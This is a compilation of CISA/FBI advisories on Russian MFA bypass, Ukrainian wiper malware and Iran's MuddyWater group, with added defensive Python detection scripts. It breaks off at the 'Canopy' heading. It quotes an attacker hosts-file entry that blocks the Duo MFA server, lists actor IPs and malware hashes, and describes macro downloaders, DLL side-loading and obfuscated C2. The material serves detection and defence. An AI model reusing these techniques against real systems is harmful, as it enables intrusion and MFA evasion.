Indicators of Compromise

Russian state-sponsored cyber actors executed the following processes:

  • ping.exe - A core Windows Operating System process used to perform the Transmission Control Protocol (TCP)/IP Ping command; used to test network connectivity to a remote host [T1018] and is frequently used by actors for network discovery [TA0007].
  • regedit.exe - A standard Windows executable file that opens the built-in registry editor [T1112].
  • rar.exe - A data compression, encryption, and archiving tool [T1560.001]. Malicious cyber actors have traditionally sought to compromise MFA security protocols as doing so would provide access to accounts or information of interest. 
  • ntdsutil.exe - A command-line tool that provides management facilities for Active Directory Domain Services. It is possible this tool was used to enumerate Active Directory user accounts [T1003.003].

Actors modified the c:\windows\system32\drivers\etc\hosts file to prevent communication with the Duo MFA server:

  • 127.0.0.1 api-<redacted>.duosecurity.com 
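
One way to check a host for the hosts-file change described above, as an added example that is not part of the advisory. The domain suffix list, the classification labels and the sample file contents (including the placeholder API hostname) are constructed assumptions.

```python
import ipaddress

# Assumption: hostname suffixes of the MFA services this host depends on.
MFA_DOMAIN_SUFFIXES = ("duosecurity.com",)


def parse_hosts(text):
    """Yield (line_no, address, hostname) for every active mapping in hosts-file text."""
    for line_no, raw in enumerate(text.splitlines(), start=1):
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        fields = line.split()
        if len(fields) < 2:
            continue
        for name in fields[1:]:  # one address may carry several aliases
            yield line_no, fields[0], name.lower().rstrip(".")


def is_mfa_host(hostname, suffixes=MFA_DOMAIN_SUFFIXES):
    """Match the suffix on a label boundary so 'notduosecurity.com' is not flagged."""
    return any(hostname == s or hostname.endswith("." + s) for s in suffixes)


def classify_address(address):
    """Describe where a hosts-file override sends the traffic."""
    try:
        addr = ipaddress.ip_address(address)
    except ValueError:
        return "invalid"
    if addr.is_loopback:
        return "loopback"
    if addr.is_unspecified:
        return "unspecified"
    if addr.is_private or addr.is_link_local:
        return "non-routable"
    return "public"


def find_mfa_overrides(text):
    """Return every hosts entry that pins an MFA service hostname to a static address.

    Any such override deserves review; loopback, unspecified, invalid and
    non-routable targets make the MFA server unreachable, which is the
    condition that triggers a "fail open" policy.
    """
    findings = []
    for line_no, address, name in parse_hosts(text):
        if is_mfa_host(name):
            findings.append({
                "line": line_no,
                "host": name,
                "address": address,
                "kind": classify_address(address),
            })
    return findings


# Constructed hosts-file contents for illustration only.
SAMPLE_HOSTS = """\
# Sample hosts file (constructed)
127.0.0.1       localhost
::1             localhost
10.20.0.15      fileserver.corp.example
127.0.0.1       api-example.duosecurity.com
# 127.0.0.1     api-commented.duosecurity.com
0.0.0.0         notduosecurity.com
"""

if __name__ == "__main__":
    for finding in find_mfa_overrides(SAMPLE_HOSTS):
        print(finding)
```

Run against the real file on domain controllers and other hosts running the MFA client, and pair it with file integrity monitoring on the same path so the change is caught when it is made.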

The following access device IP addresses used by the actors have been identified to date:

  • 45.32.137[.]94
  • 191.96.121[.]162
  • 173.239.198[.]46
  • 157.230.81[.]39 
Mitigations

The FBI and CISA recommend organizations remain cognizant of the threat of state-sponsored cyber actors exploiting default MFA protocols and exfiltrating sensitive information. Organizations should:

  • Enforce MFA for all users, without exception. Before implementing, organizations should review configuration policies to protect against “fail open” and re-enrollment scenarios.
  • Implement time-out and lock-out features in response to repeated failed login attempts.
  • Ensure inactive accounts are disabled uniformly across the Active Directory, MFA systems, etc.
  • Update software, including operating systems, applications, and firmware on IT network assets in a timely manner. Prioritize patching known exploited vulnerabilities, especially critical and high vulnerabilities that allow for remote code execution or denial-of-service on internet-facing equipment.
  • Require all accounts with password logins (e.g., service account, admin accounts, and domain admin accounts) to have strong, unique passwords. Passwords should not be reused across multiple accounts or stored on the system where an adversary may have access.
  • Continuously monitor network logs for suspicious activity and unauthorized or unusual login attempts.
  • Implement security alerting policies for all changes to security-enabled accounts/groups, and alert on suspicious process creation events (ntdsutil, rar, regedit, etc.).
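
The "disabled uniformly" recommendation above can be audited by reconciling an Active Directory account export against the MFA enrollment list. This is an added example, not part of the advisory; the record layout, the finding codes, the 90-day inactivity threshold and all sample accounts are constructed assumptions.

```python
from datetime import datetime, timedelta


def normalize(name):
    """Reduce DOMAIN\\user, user@domain and mixed case to a bare lowercase name."""
    name = name.strip().lower()
    if "\\" in name:
        name = name.split("\\", 1)[1]
    return name.split("@", 1)[0]


def audit_accounts(ad_accounts, mfa_enrolled, now, inactive_days=90):
    """Return (user, finding) pairs where AD state and MFA state disagree.

    enabled-no-mfa          enabled in AD with no enrolled device, so the next
                            successful password login could enroll a new one
    dormant-enabled         enrolled but unused past the threshold, still enabled
    disabled-still-enrolled disabled in AD but left active in the MFA system
    mfa-orphan              enrolled in MFA with no matching AD account
    """
    enrolled = {normalize(user) for user in mfa_enrolled}
    cutoff = now - timedelta(days=inactive_days)
    findings = []
    seen = set()
    for account in ad_accounts:
        user = normalize(account["sam"])
        seen.add(user)
        last_logon = account["last_logon"]
        dormant = last_logon is None or last_logon < cutoff
        if account["enabled"] and user not in enrolled:
            findings.append((user, "enabled-no-mfa"))
        elif account["enabled"] and dormant:
            findings.append((user, "dormant-enabled"))
        elif not account["enabled"] and user in enrolled:
            findings.append((user, "disabled-still-enrolled"))
    for user in sorted(enrolled - seen):
        findings.append((user, "mfa-orphan"))
    return findings


# Constructed export data for illustration only.
SAMPLE_NOW = datetime(2022, 3, 15)
SAMPLE_AD = [
    {"sam": "alice", "enabled": True, "last_logon": datetime(2022, 3, 10)},
    {"sam": "CORP\\bob", "enabled": True, "last_logon": datetime(2021, 1, 5)},
    {"sam": "carol", "enabled": True, "last_logon": datetime(2021, 6, 1)},
    {"sam": "dave", "enabled": False, "last_logon": datetime(2020, 11, 2)},
    {"sam": "svc-backup", "enabled": True, "last_logon": None},
]
SAMPLE_MFA = ["Alice", "Carol@corp.example", "dave", "erin"]

if __name__ == "__main__":
    for user, finding in audit_accounts(SAMPLE_AD, SAMPLE_MFA, SAMPLE_NOW):
        print(f"{user:12} {finding}")
```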

Note: If a domain controller compromise is suspected, a domain-wide password reset—including service accounts, Microsoft 365 (M365) synchronization accounts, and krbtgt—will be necessary to remove the actors’ access. (For more information, see https://docs.microsoft.com/en-us/answers/questions/87978/reset-krbtgt-password.html). Consider soliciting support from a third-party IT organization to provide subject matter expertise, ensure the actor is eradicated from the network, and avoid residual issues that could enable follow-on exploitation.  

FBI and CISA also recommend organizations implement the recommendations listed below to further reduce the risk of malicious cyber activity.

Security Best Practices
  • Deploy Local Administrator Password Solution (LAPS), enforce Server Message Block (SMB) Signing, restrict Administrative privileges (local admin users, groups, etc.), and review sensitive materials on domain controller’s SYSVOL share.
  • Enable increased logging policies, enforce PowerShell logging, and ensure antivirus/endpoint detection and response (EDR) are deployed to all endpoints and enabled.
  • Routinely verify no unauthorized system modifications, such as additional accounts and Secure Shell (SSH) keys, have occurred to help detect a compromise. To detect these modifications, administrators can use file integrity monitoring software that alerts an administrator or blocks unauthorized changes on the system. 
Network Best Practices
  • Monitor remote access/RDP logs and disable unused remote access/RDP ports.
  • Deny atypical inbound activity from known anonymization services, to include commercial VPN services and The Onion Router (TOR).
  • Implement listing policies for applications and remote access that only allow systems to execute known and permitted programs under an established security policy.
  • Regularly audit administrative user accounts and configure access control under the concept of least privilege. 
  • Regularly audit logs to ensure new accounts are legitimate users.
  • Scan networks for open and listening ports and mediate those that are unnecessary.
  • Maintain historical network activity logs for at least 180 days, in case of a suspected compromise.
  • Identify and create offline backups for critical assets.
  • Implement network segmentation.
  • Automatically update anti-virus and anti-malware solutions and conduct regular virus and malware scans.
Remote Work Environment Best Practices

With an increase in remote work environments and the use of VPN services, the FBI and CISA encourage organizations to implement the following best practices to improve network security:

  • Regularly update VPNs, network infrastructure devices, and devices used for remote work environments with the latest software patches and security configurations.
  • When possible, implement multi-factor authentication on all VPN connections. Physical security tokens are the most secure form of MFA, followed by authenticator applications. When MFA is unavailable, require employees engaging in remote work to use strong passwords.
  • Monitor network traffic for unapproved and unexpected protocols.
  • Reduce potential attack surfaces by discontinuing unused VPN servers that may be used as a point of entry for attackers.
User Awareness Best Practices

Cyber actors frequently use unsophisticated methods to gain initial access, which can often be mitigated by stronger employee awareness of indicators of malicious activity. The FBI and CISA recommend the following best practices to improve employee operations security when conducting business:

  • Provide end-user awareness and training. To help prevent targeted social engineering and spearphishing scams, ensure that employees and stakeholders are aware of potential cyber threats and delivery methods. Also, provide users with training on information security principles and techniques. 
  • Inform employees of the risks associated with posting detailed career information to social or professional networking sites.
  • Ensure that employees are aware of what to do and whom to contact when they see suspicious activity or suspect a cyberattack, to help quickly and efficiently identify threats and employ mitigation strategies.
Information Requested

All organizations should report incidents and anomalous activity to the FBI via your local FBI field office or the FBI’s 24/7 CyWatch at (855) 292-3937 or CyWatch@fbi.gov and/or CISA’s 24/7 Operations Center at report@cisa.gov or (888) 282-0870. 

APPENDIX A: Threat Actor Tactics and Techniques

See table 1 for the threat actors’ tactics and techniques identified in this CSA. See the ATT&CK for Enterprise for all referenced threat actor tactics and techniques.

Table 1: Threat Actor MITRE ATT&CK Tactics and Techniques

Tactic | Technique
Initial Access [TA0001] | Valid Accounts [T1078]
Persistence [TA0003] | External Remote Services [T1133]; Modify Authentication Process [T1556]
Privilege Escalation [TA0004] | Exploitation for Privilege Escalation [T1068]
Defense Evasion [TA0005] | Modify Registry [T1112]
Credential Access [TA0006] | Brute Force: Password Guessing [T1110.001]; OS Credential Dumping: NTDS [T1003.003]
Discovery [TA0007] | Remote System Discovery [T1018]
Lateral Movement [TA0008] |
Collection [TA0009] | Archive Collected Data: Archive via Utility [T1560.001]

Revisions
  • March 15, 2022: Initial Version


AA22-057A: Update: Destructive Malware Targeting Organizations in Ukraine

US-CERT Security Alerts - Sat, 02/26/2022 - 07:00
Original release date: February 26, 2022 | Last revised: April 28, 2022
Summary

Actions to Take Today:
• Set antivirus and antimalware programs to conduct regular scans.
• Enable strong spam filters to prevent phishing emails from reaching end users.
• Filter network traffic.
• Update software.
• Require multifactor authentication.

(Updated April 28, 2022) This advisory has been updated to include additional Indicators of Compromise (IOCs) for WhisperGate and technical details for HermeticWiper, IsaacWiper, HermeticWizard, and CaddyWiper destructive malware, all of which have been deployed against Ukraine since January 2022. Additional IOCs associated with WhisperGate are in the Appendix, and specific malware analysis reports (MAR) are hyperlinked below.  

(end of update)

Leading up to Russia’s unprovoked attack against Ukraine, threat actors deployed destructive malware against organizations in Ukraine to destroy computer systems and render them inoperable. 

  • On January 15, 2022, the Microsoft Threat Intelligence Center (MSTIC) disclosed that malware, known as WhisperGate, was being used to target organizations in Ukraine. According to Microsoft, WhisperGate is intended to be destructive and is designed to render targeted devices inoperable. 
  • On February 23, 2022, several cybersecurity researchers disclosed that malware known as HermeticWiper was being used against organizations in Ukraine. According to SentinelLabs, the malware targets Windows devices, manipulating the master boot record, which results in subsequent boot failure. 

Destructive malware can present a direct threat to an organization’s daily operations, impacting the availability of critical assets and data. Further disruptive cyberattacks against organizations in Ukraine are likely to occur and may unintentionally spill over to organizations in other countries. Organizations should increase vigilance and evaluate their capabilities encompassing planning, preparation, detection, and response for such an event. 

This joint Cybersecurity Advisory (CSA) between the Cybersecurity and Infrastructure Security Agency (CISA) and Federal Bureau of Investigation (FBI) provides information on WhisperGate and HermeticWiper malware as well as open-source indicators of compromise (IOCs) for organizations to detect and prevent the malware. Additionally, this joint CSA provides recommended guidance and considerations for organizations to address as part of network architecture, security baseline, continuous monitoring, and incident response practices.

Download the Joint Cybersecurity Advisory: Update: Destructive Malware Targeting Organizations in Ukraine (pdf, 559kb).

Technical Details

Threat actors have deployed destructive malware, including both WhisperGate and HermeticWiper, against organizations in Ukraine to destroy computer systems and render them inoperable. Listed below are high-level summaries of campaigns employing the malware. CISA recommends organizations review the resources listed below for more in-depth analysis and see the Mitigation section for best practices on handling destructive malware.   

On January 15, 2022, Microsoft announced the identification of a sophisticated malware operation targeting multiple organizations in Ukraine. The malware, known as WhisperGate, has two stages that corrupt a system’s master boot record, display a fake ransomware note, and encrypt files based on certain file extensions. Note: although a ransomware message is displayed during the attack, Microsoft highlighted that the targeted data is destroyed, and is not recoverable even if a ransom is paid. See Microsoft’s blog on Destructive malware targeting Ukrainian organizations for more information and see the IOCs in table 1.

Table 1: IOCs associated with WhisperGate

Name | File Category | File Hash | Source
WhisperGate | stage1.exe | a196c6b8ffcb97ffb276d04f354696e2391311db3841ae16c8c9f56f36a38e92 | Microsoft MSTIC
WhisperGate | stage2.exe | dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78 | Microsoft MSTIC

(Updated April 28, 2022) See Appendix: Additional IOCs associated with WhisperGate.

On February 23, 2022, cybersecurity researchers disclosed that malware known as HermeticWiper was being used against organizations in Ukraine. According to SentinelLabs, the malware targets Windows devices, manipulating the master boot record and resulting in subsequent boot failure. Note: according to Broadcom Software, “[HermeticWiper] has some similarities to the earlier WhisperGate wiper attacks against Ukraine, where the wiper was disguised as ransomware.” See the following resources for more information and see the IOCs in table 2 below. 

Table 2: IOCs associated with HermeticWiper

Mitigations

Best Practices for Handling Destructive Malware

As noted above, destructive malware can present a direct threat to an organization’s daily operations, impacting the availability of critical assets and data. Organizations should increase vigilance and evaluate their capabilities, encompassing planning, preparation, detection, and response, for such an event. This section is focused on the threat of malware using enterprise-scale distributed propagation methods and provides recommended guidance and considerations for an organization to address as part of their network architecture, security baseline, continuous monitoring, and incident response practices.

CISA and the FBI urge all organizations to implement the following recommendations to increase their cyber resilience against this threat.

Potential Distribution Vectors

Destructive malware may use popular communication tools to spread, including worms sent through email and instant messages, Trojan horses dropped from websites, and virus-infected files downloaded from peer-to-peer connections. Malware seeks to exploit existing vulnerabilities on systems for quiet and easy access.

The malware has the capability to target a large scope of systems and can execute across multiple systems throughout a network. As a result, it is important for organizations to assess their environment for atypical channels for malware delivery and/or propagation throughout their systems. Systems to assess include:

  • Enterprise applications – particularly those that have the capability to directly interface with and impact multiple hosts and endpoints. Common examples include:
    • Patch management systems,
    • Asset management systems,
    • Remote assistance software (typically used by the corporate help desk),
    • Antivirus (AV) software,
    • Systems assigned to system and network administrative personnel,
    • Centralized backup servers, and
    • Centralized file shares.

While not only applicable to malware, threat actors could compromise additional resources to impact the availability of critical data and applications. Common examples include:

  • Centralized storage devices
    • Potential risk – direct access to partitions and data warehouses.
  • Network devices
    • Potential risk – capability to inject false routes within the routing table, delete specific routes from the routing table, remove/modify configuration attributes, or destroy firmware or system binaries—which could isolate or degrade availability of critical network resources.
Best Practices and Planning Strategies

Common strategies can be followed to strengthen an organization’s resilience against destructive malware. Targeted assessment and enforcement of best practices should be employed for enterprise components susceptible to destructive malware.

Communication Flow
  • Ensure proper network segmentation.
  • Ensure that network-based access control lists (ACLs) are configured to permit server-to-host and host-to-host connectivity via the minimum scope of ports and protocols and that directional flows for connectivity are represented appropriately.
    • Communications flow paths should be fully defined, documented, and authorized.
  • Increase awareness of systems that can be used as a gateway to pivot (lateral movement) or directly connect to additional endpoints throughout the enterprise.
    • Ensure that these systems are contained within restrictive Virtual Local Area Networks (VLANs), with additional segmentation and network access controls.
  • Ensure that centralized network and storage devices’ management interfaces reside on restrictive VLANs.
    • Layered access control, and
    • Device-level access control enforcement – restricting access from only pre-defined VLANs and trusted IP ranges.
Access Control
  • For enterprise systems that can directly interface with multiple endpoints:
    • Require multifactor authentication for interactive logons.
    • Ensure that authorized users are mapped to a specific subset of enterprise personnel.
      • If possible, the “Everyone,” “Domain Users,” or the “Authenticated Users” groups should not be permitted the capability to directly access or authenticate to these systems.
    • Ensure that unique domain accounts are used and documented for each enterprise application service.
      • Context of permissions assigned to these accounts should be fully documented and configured based upon the concept of least privilege.
      • Provides an enterprise with the capability to track and monitor specific actions correlating to an application’s assigned service account.
    • If possible, do not grant a service account with local or interactive logon permissions.
      • Service accounts should be explicitly denied permissions to access network shares and critical data locations.
    • Accounts that are used to authenticate to centralized enterprise application servers or devices should not contain elevated permissions on downstream systems and resources throughout the enterprise.
  • Continuously review centralized file share ACLs and assigned permissions.
    • Restrict Write/Modify/Full Control permissions when possible.
Monitoring
  • Audit and review security logs for anomalous references to enterprise-level administrative (privileged) and service accounts.
    • Failed logon attempts,
    • File share access, and
    • Interactive logons via a remote session.
  • Review network flow data for signs of anomalous activity, including:
    • Connections using ports that do not correlate to the standard communications flow associated with an application,
    • Activity correlating to port scanning or enumeration, and
    • Repeated connections using ports that can be used for command and control purposes.
  • Ensure that network devices log and audit all configuration changes.
    • Continually review network device configurations and rule sets to ensure that communications flows are restricted to the authorized subset of rules.
File Distribution
  • When deploying patches or AV signatures throughout an enterprise, stage the distributions to include a specific grouping of systems (staggered over a pre-defined period).
    • This action can minimize the overall impact in the event that an enterprise patch management or AV system is leveraged as a distribution vector for a malicious payload.
  • Monitor and assess the integrity of patches and AV signatures that are distributed throughout the enterprise.
    • Ensure updates are received only from trusted sources,
    • Perform file and data integrity checks, and
    • Monitor and audit – as related to the data that is distributed from an enterprise application.
System and Application Hardening
  • Ensure robust vulnerability management and patching practices are in place. 
    • CISA maintains a living catalog of known exploited vulnerabilities that carry significant risk to federal agencies as well as public and private sector entities. In addition to thoroughly testing and implementing vendor patches in a timely—and, if possible, automated—manner, organizations should ensure patching of the vulnerabilities CISA includes in this catalog.
  • Ensure that the underlying operating system (OS) and dependencies (e.g., Internet Information Services [IIS], Apache, Structured Query Language [SQL]) supporting an application are configured and hardened based upon industry-standard best practice recommendations. Implement application-level security controls based on best practice guidance provided by the vendor. Common recommendations include:
    • Use role-based access control,
    • Prevent end-user capabilities to bypass application-level security controls,
      • For example, do not allow users to disable AV on local workstations.
    • Remove or disable unnecessary or unused features or packages, and
    • Implement robust application logging and auditing.

Recovery and Reconstitution Planning

A business impact analysis (BIA) is a key component of contingency planning and preparation. The overall output of a BIA will provide an organization with two key components (as related to critical mission/business operations):

  • Characterization and classification of system components, and
  • Interdependencies.

Based upon the identification of an organization’s mission critical assets (and their associated interdependencies), in the event that an organization is impacted by destructive malware, recovery and reconstitution efforts should be considered.

To plan for this scenario, an organization should address the availability and accessibility for the following resources (and should include the scope of these items within incident response exercises and scenarios):

  • Comprehensive inventory of all mission critical systems and applications:
    • Versioning information,
    • System/application dependencies,
    • System partitioning/storage configuration and connectivity, and
    • Asset owners/points of contact.
  • Contact information for all essential personnel within the organization,
  • Secure communications channel for recovery teams,
  • Contact information for external organizational-dependent resources:
    • Communication providers,
    • Vendors (hardware/software), and
    • Outreach partners/external stakeholders
  • Service contract numbers – for engaging vendor support,
  • Organizational procurement points of contact,
  • Optical disc image (ISO)/image files for baseline restoration of critical systems and applications:
    • OS installation media,
    • Service packs/patches,
    • Firmware, and
    • Application software installation packages.
  • Licensing/activation keys for OS and dependent applications,
  • Enterprise network topology and architecture diagrams,
  • System and application documentation,
  • Hard copies of operational checklists and playbooks,
  • System and application configuration backup files,
  • Data backup files (full/differential),
  • System and application security baseline and hardening checklists/guidelines, and
  • System and application integrity test and acceptance checklists.

Incident Response

Victims of a destructive malware attack should immediately focus on containment to reduce the scope of affected systems. Strategies for containment include:

  • Determining a vector common to all systems experiencing anomalous behavior (or having been rendered unavailable)—from which a malicious payload could have been delivered:
    • Centralized enterprise application,
    • Centralized file share (for which the identified systems were mapped or had access),
    • Privileged user account common to the identified systems,
    • Network segment or boundary, and
    • Common Domain Name System (DNS) server for name resolution.
  • Based upon the determination of a likely distribution vector, additional mitigation controls can be enforced to further minimize impact:
    • Implement network-based ACLs to deny the identified application(s) the capability to directly communicate with additional systems,
      • Provides an immediate capability to isolate and sandbox specific systems or resources.
    • Implement null network routes for specific IP addresses (or IP ranges) from which the payload may be distributed,
      • An organization’s internal DNS can also be leveraged for this task, as a null pointer record could be added within a DNS zone for an identified server or application.
    • Readily disable access for suspected user or service account(s),
    • For suspect file shares (which may be hosting the infection vector), remove access or disable the share path from being accessed by additional systems, and
    • Be prepared to, if necessary, reset all passwords and tickets within directories (e.g., changing golden/silver tickets). 

As related to incident response and incident handling, organizations are encouraged to report incidents to the FBI and CISA (see the Contact section below) and to preserve forensic data for use in internal investigation of the incident or for possible law enforcement purposes. See Technical Approaches to Uncovering and Remediating Malicious Activity for more information.

Contact Information

All organizations should report incidents and anomalous activity to CISA 24/7 Operations Center at central@cisa.dhs.gov or (888) 282-0870 and/or to the FBI via your local FBI field office or the FBI’s 24/7 CyWatch at (855) 292-3937 or CyWatch@fbi.gov.

Resources

Updated April 28, 2022:

Appendix: Additional IOCs Associated with WhisperGate

The hashes in Table 3 contain malicious binaries, droppers, and macros linked to WhisperGate cyber actors' activity. The binaries are predominantly .Net and are obfuscated. Obfuscation varies; some of the binaries contain multiple layers of obfuscation. Analysis identified multiple uses of string reversal, character replacement, base64 encoding, and packing. Additionally, the malicious binaries contain multiple defenses including VM checks, sandbox detection and evasion, and anti-debugging techniques. Finally, the sleep command was used in varying lengths via PowerShell to obfuscate execution on a victim’s network.
All Microsoft .doc files contain a malicious macro that is base64 encoded. Upon enabling the macro, a PowerShell script runs a sleep command and then downloads a file from an external site. The script connects to the external website via HTTP to download an executable. Upon download, the executable is saved to C:\Users\Public\Documents\ filepath on the victim host. 
An identified zip file was found to contain the Microsoft Word file macro_t1smud.doc. Once the macro is enabled, a bash script runs a sleep command and the script connects to htxxps://the.earth.li/~sgtatham/putty/latest/w32/putty.exe. This binary is likely the legitimate Putty Secure Shell binary. Upon download the file is saved to C:\Users\Public\Documents\ file path.

Profile of Malicious Hashes

  • Saintbot (and related .Net loaders) 
  • WhisperGate Malware and related VB files 
  • Quasar RAT 
  • .NET Infostealer malware
  • Telegram Bot
  • Multiple Loaders (mostly utilizing PowerShell that pull down a jpg or bin files)
  • Jpg/PNG files = obfuscated executables
  • antidef.bat = likely a bat file to disable Windows Defender

Table 3: Additional IOCs associated with WhisperGate

Revisions
  • February 26, 2022: Initial Revision
  • March 1, 2022: Added STIX version.
  • April 28, 2022: Updated IOCs.

AA22-055A: Iranian Government-Sponsored Actors Conduct Cyber Operations Against Global Government and Commercial Networks

US-CERT Security Alerts - Thu, 02/24/2022 - 08:00
Original release date: February 24, 2022
Summary

Actions to Take Today to Protect Against Malicious Activity
  • Search for indicators of compromise.
  • Use antivirus software.
  • Patch all systems.
  • Prioritize patching known exploited vulnerabilities.
  • Train users to recognize and report phishing attempts.
  • Use multi-factor authentication.

Note: this advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework, version 10. See the ATT&CK for Enterprise for all referenced threat actor tactics and techniques.

The Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the U.S. Cyber Command Cyber National Mission Force (CNMF), and the United Kingdom’s National Cyber Security Centre (NCSC-UK) have observed a group of Iranian government-sponsored advanced persistent threat (APT) actors, known as MuddyWater, conducting cyber espionage and other malicious cyber operations targeting a range of government and private-sector organizations across sectors—including telecommunications, defense, local government, and oil and natural gas—in Asia, Africa, Europe, and North America. Note: MuddyWater is also known as Earth Vetala, MERCURY, Static Kitten, Seedworm, and TEMP.Zagros.

MuddyWater is a subordinate element within the Iranian Ministry of Intelligence and Security (MOIS).[1] This APT group has conducted broad cyber campaigns in support of MOIS objectives since approximately 2018. MuddyWater actors are positioned both to provide stolen data and accesses to the Iranian government and to share these with other malicious cyber actors.

MuddyWater actors are known to exploit publicly reported vulnerabilities and use open-source tools and strategies to gain access to sensitive data on victims’ systems and deploy ransomware. These actors also maintain persistence on victim networks via tactics such as side-loading dynamic link libraries (DLLs)—to trick legitimate programs into running malware—and obfuscating PowerShell scripts to hide command and control (C2) functions. FBI, CISA, CNMF, and NCSC-UK have observed MuddyWater actors recently using various malware—variants of PowGoop, Small Sieve, Canopy (also known as Starwhale), Mori, and POWERSTATS—along with other tools as part of their malicious activity. 

This advisory provides observed tactics, techniques, and procedures (TTPs); malware; and indicators of compromise (IOCs) associated with this Iranian government-sponsored APT activity to aid organizations in the identification of malicious activity against sensitive networks. 

FBI, CISA, CNMF, NCSC-UK, and the National Security Agency (NSA) recommend organizations apply the mitigations in this advisory and review the following resources for additional information. Note: also see the Additional Resources section.

Technical Details

FBI, CISA, CNMF, and NCSC-UK have observed the Iranian government-sponsored MuddyWater APT group employing spearphishing, exploiting publicly known vulnerabilities, and leveraging multiple open-source tools to gain access to sensitive government and commercial networks. 

As part of its spearphishing campaign, MuddyWater attempts to coax their targeted victim into downloading ZIP files, containing either an Excel file with a malicious macro that communicates with the actor’s C2 server or a PDF file that drops a malicious file to the victim’s network [T1566.001, T1204.002]. MuddyWater actors also use techniques such as side-loading DLLs [T1574.002] to trick legitimate programs into running malware and obfuscating PowerShell scripts [T1059.001] to hide C2 functions [T1027] (see the PowGoop section for more information). 

Additionally, the group uses multiple malware sets—including PowGoop, Small Sieve, Canopy/Starwhale, Mori, and POWERSTATS—for loading malware, backdoor access, persistence [TA0003], and exfiltration [TA0010]. See below for descriptions of some of these malware sets, including newer tools or variants to the group’s suite. Additionally, see Malware Analysis Report MAR-10369127.r1.v1: MuddyWater for further details.

PowGoop

MuddyWater actors use new variants of PowGoop malware as their main loader in malicious operations; it consists of a DLL loader and a PowerShell-based downloader. The malicious file impersonates a legitimate file that is signed as a Google Update executable file.

According to samples of PowGoop analyzed by CISA and CNMF, PowGoop consists of three components:

  • A DLL file renamed as a legitimate filename, Goopdate.dll, to enable the DLL side-loading technique [T1574.002]. The DLL file is contained within an executable, GoogleUpdate.exe. 
  • A PowerShell script, obfuscated as a .dat file, goopdate.dat, used to decrypt and run a second obfuscated PowerShell script, config.txt [T1059.001].
  • config.txt, an encoded, obfuscated PowerShell script containing a beacon to a hardcoded IP address.

These components retrieve encrypted commands from a C2 server. The DLL file hides communications with MuddyWater C2 servers by executing with the Google Update service. 

Small Sieve

According to a sample analyzed by NCSC-UK, Small Sieve is a simple Python [T1059.006] backdoor distributed using a Nullsoft Scriptable Install System (NSIS) installer, gram_app.exe. The NSIS installs the Python backdoor, index.exe, and adds it as a registry run key [T1547.001], enabling persistence [TA0003]. 

MuddyWater disguises malicious executables and uses filenames and Registry key names associated with Microsoft's Windows Defender to avoid detection during casual inspection. The APT group has also used variations of Microsoft (e.g., "Microsift") and Outlook in its filenames associated with Small Sieve [T1036.005].

Small Sieve provides basic functionality required to maintain and expand a foothold in victim infrastructure and avoid detection [TA0005] by using custom string and traffic obfuscation schemes together with the Telegram Bot application programming interface (API). Specifically, Small Sieve’s beacons and taskings are performed using Telegram API over Hypertext Transfer Protocol Secure (HTTPS) [T1071.001], and the tasking and beaconing data is obfuscated through a hex byte swapping encoding scheme combined with an obfuscated Base64 function [T1027, T1132.002].

Note: cybersecurity agencies in the United Kingdom and the United States attribute Small Sieve to MuddyWater with high confidence. 

See Appendix B for further analysis of Small Sieve malware.
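The masquerading described in this section (run-key persistence under names that imitate Microsoft, Outlook and Windows Defender) can be hunted by scoring autorun entries for look-alike spellings. The Python below is an added example, not code from the advisory: the function names, distance thresholds, user-writable path markers and registry entries are all assumptions or constructed samples.

```python
"""Flag Run-key entries that imitate Microsoft, Outlook or Windows Defender naming.

Added hunting example; the registry entries below are constructed samples.
"""
import re

# Brand terms named in the advisory, with the largest edit distance still
# treated as a look-alike (assumed thresholds; distance 0 is the real spelling).
BRANDS = {"microsoft": 2, "outlook": 1}

# Assumption: locations a standard user can write to, where a Defender-named
# autorun binary would be unexpected.
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\")

# Splits on punctuation and camelCase boundaries: "OutlookMicrosift" -> 2 tokens.
TOKEN_RE = re.compile(r"[A-Z]?[a-z0-9]+|[A-Z0-9]+")
EXE_RE = re.compile(r"(.+?\.(?:exe|dll|bat|cmd|vbs|js|wsf|ps1))(?:\s|$)", re.I)


def edit_distance(a, b):
    """Levenshtein distance between two strings (two-row dynamic programming)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def exe_path(command):
    """Return the program path from a Run-key command line, without arguments."""
    command = command.strip()
    if command.startswith('"'):
        return command[1:].split('"', 1)[0]
    match = EXE_RE.match(command)
    return match.group(1) if match else command.split(" ", 1)[0]


def tokens(text):
    """Lower-cased word tokens of a value name or path."""
    return {t.lower() for t in TOKEN_RE.findall(text)}


def assess_run_entry(name, command):
    """Return the reasons (possibly none) why one Run-key value looks like masquerading."""
    path = exe_path(command)
    reasons = []
    for tok in sorted(tokens(name + " " + path)):
        for brand, limit in BRANDS.items():
            if 0 < edit_distance(tok, brand) <= limit:
                reasons.append("'%s' is a near-miss of '%s'" % (tok, brand))
    if "defender" in tokens(name) and any(m in path.lower() for m in USER_WRITABLE):
        reasons.append("Defender-named entry runs from a user-writable path")
    return reasons


def hunt(entries):
    """Map value name -> reasons for every entry that raised at least one."""
    flagged = {}
    for name, command in entries:
        reasons = assess_run_entry(name, command)
        if reasons:
            flagged[name] = reasons
    return flagged


# Constructed Run-key values: (value name, command line).
SAMPLE_RUN_KEYS = [
    ("OneDrive", r'"C:\Users\jdoe\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
    ("SecurityHealth", r"%windir%\system32\SecurityHealthSystray.exe"),
    ("WindowsDefender", r'"%ProgramFiles%\Windows Defender\MSASCuiL.exe"'),
    ("OutlookMicrosift", r"C:\Users\jdoe\AppData\Roaming\OutlookMicrosift\index.exe"),
    ("WindowsDefenderUpdate", r"C:\Users\Public\Documents\defender\update.exe"),
]

if __name__ == "__main__":
    for value_name, why in hunt(SAMPLE_RUN_KEYS).items():
        print(value_name, "->", "; ".join(why))
```

A hit is a lead for review rather than a verdict; the thresholds trade missed look-alikes against false positives and should be tuned against a baseline of known-good autoruns.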

Canopy

